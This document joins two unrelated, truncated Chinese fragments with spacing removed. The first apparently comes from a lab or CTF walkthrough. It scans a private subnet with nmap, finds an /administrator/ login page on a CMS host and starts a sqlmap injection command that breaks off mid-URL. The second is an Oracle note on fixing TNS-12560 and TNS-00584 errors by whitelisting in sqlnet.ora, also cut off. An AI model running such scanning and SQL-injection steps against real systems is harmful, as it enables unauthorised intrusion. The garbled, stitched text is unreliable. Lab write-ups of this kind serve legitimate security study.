nmap-sV10.204.11.0/24先进行扫描找到靶机开启了80端口查看一下再扫一下目录发现后台登陆页面http://10.204.11.6/administrator/没有账号密码去查一下这个cms的漏洞我们直接sqlmap查出我们所要用的全部信息即可pythonsqlmap.py-u"http://10.204.11.6:80/index

启动报错：TNS-12560:TNS:protocoladaptererrorTNS-00584:ValidnodecheckingconfigurationerrorTNS-12560:TNS:协议适配器错误同时伴有TNS-00584:有效节点检查配置错误的解决方法：vi/home/oracle/app/product/11.2.0/db_1/network/admin/sqlnet.ora增加白名单：tcp.v